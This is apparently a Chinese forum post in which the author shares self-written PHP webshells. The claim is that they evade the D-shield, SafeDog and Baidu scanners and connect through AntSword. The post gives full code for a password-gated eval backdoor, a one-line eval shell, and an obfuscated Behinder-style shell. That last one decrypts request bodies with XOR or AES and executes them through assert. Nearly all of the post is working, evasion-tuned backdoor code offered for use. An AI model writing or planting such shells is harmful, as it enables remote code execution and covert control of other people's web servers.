自己写了几个webshell,博君一笑。
目前过D盾,安全狗,百度
不过shellpub(河马)。
经测试,兼容php5.4-7.3版本,使用蚁剑可正常连接
由于蚁剑的连接机制,无法在蚁剑客户端中增加post数据包
直奔主题
<?php
if($_POST){$array = $_POST;}
$a="7a4912";//密码为32位md5的后6位,默认aa
$k = array_keys($array)[0];
$v = substr(md5($k),26);
if ($v != $a){die();}
class Php
{
function __construct($content,$data = []){
$this->content = $content;
$b = $this->content;
eval('$a = "" ;' . $b . '');
}
}
$aac = new Php($array[$k]);
2022年6月10日更新:修复蚁剑虽然显示连接成功,但无法操作的问题
另增:一句话过D盾安全狗
<? $array = $_POST; $a = "aa"; $c = $array[$a]; $b = str_replace("acev","acev",$c); eval('$a = "" ;'.$b.'$c = "" ;');
也不藏着掖着,再分享一个冰蝎马,经测试,php 5.3 – 7.3 版本可正常运行
<?php
@error_reporting(0);
session_start();
$k="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION['k']=$k;
session_write_close();
$i = "contents";
$f = "file_get_{$i}";
$tsop=$f("php://input");
$o = "openssl";
if(!extension_loaded($o))
{
$tt = "edoced";
$t="base64_".$tt;
$tsop=$t($tsop."");
for($i=0;$i<strlen($tsop);$i++) {
$dc = $tsop[$i]^$k[$i+1&15];
$tsop[$i] = $dc;
}
}
else
{
$tsop=openssl_decrypt($tsop, "AES128", $k);
}
$rra=explode('|',$tsop);
$cnuf=$rra[0];
$smarap=$rra[1];
class CACCC{
function __invoke($p) {
assert("/*aaaacc?>:\"cc*/".NULL.$p.NULL."");
}
}
$obj = new CACCC;
@$obj($smarap);
?>
没有回复内容